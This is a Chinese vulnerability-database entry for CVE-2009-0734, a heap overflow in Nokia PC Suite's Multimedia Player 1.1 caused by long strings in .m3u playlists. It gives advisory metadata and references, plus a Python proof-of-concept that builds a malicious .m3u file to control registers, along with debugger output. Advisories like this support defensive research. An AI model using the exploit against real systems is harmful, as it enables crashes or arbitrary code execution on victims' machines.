Nokia PC Suite 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117330 漏洞类型 缓冲区溢出
发布时间 2009-02-03 更新时间 2009-03-06
CVE编号 CVE-2009-0734 CNNVD-ID CNNVD-200902-559
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/32772
https://www.securityfocus.com/bid/33586
https://cxsecurity.com/issue/WLB-2009020007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-559
|漏洞详情
NokiaPCSuite是专为Nokia手机开发的基于Windows系统平台的应用程序。NokiaPCSuite6.86.9.3版本的MultimediaPlayer.exe6.86.240.7版本中存在堆缓冲区溢出。远程攻击者可以借助a.m3uplaylist文件中的一个长的字符串,执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/33586/info

Nokia Multimedia Player is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.

Nokia Multimedia Player 1.1 is vulnerable; other versions may also be affected. 

# Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit
# by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl]
#   http://www.Dark-Coders.pl
#   Special thx to doctor ( for together analyse this shi*) and sun8hclf ( for tell me.. "to unicode.")
#   Greetings to: Die,m4r1usz,cOndemned (;> ?),joker,chomzee,TBH
#       Nokia Multimedia Player is a element of Nokia PC Suite packet.
#       DOWNLOAD:http://europe.nokia.com/A4144905
#           Vuln:
#                   This is heap overflow vuln, we can control EAX & EDI registers
#                   (on my Windows XP sp3) with UNICODE chars...
#           DEBUG:
#                       "Access violation when reading [00130013]" 
#                        EAX 00130013  <- ! 
#                        EDX 00000000
#                        EBX 00970000
#                        ESP 0012F96C
#                        EBP 0012FB8C
#                        ESI 00AD26B0
#                        EDI 00900011  <- ! 
#                        EIP 7C910CB0 ntdll.7C910CB0
#!/usr/bin/python
eax="\x13\x13" # eax : 00130013
edi="\x11\x90"  # edi : 00900011
buf="F"*261
buf+=edi+eax
buf+="B"*235
file_name="spl0.m3u"
ce=buf
f=open(file_name,'w')
f.write(ce)
f.close()
print 'PoC created!'
|受影响的产品
Nokia Multimedia Player 1.1
|参考资料

来源:VUPEN
名称:ADV-2009-0318
链接:http://www.vupen.com/english/advisories/2009/0318
来源:BUGTRAQ
名称:20090203NokiaMultimediaPlayerv1.1.m3uHeapOverflowPoCexploit
链接:http://www.securityfocus.com/archive/1/archive/1/500627/100/0/threaded
来源:SECUNIA
名称:33796
链接:http://secunia.com/advisories/33796
来源:OSVDB
名称:51739
链接:http://osvdb.org/51739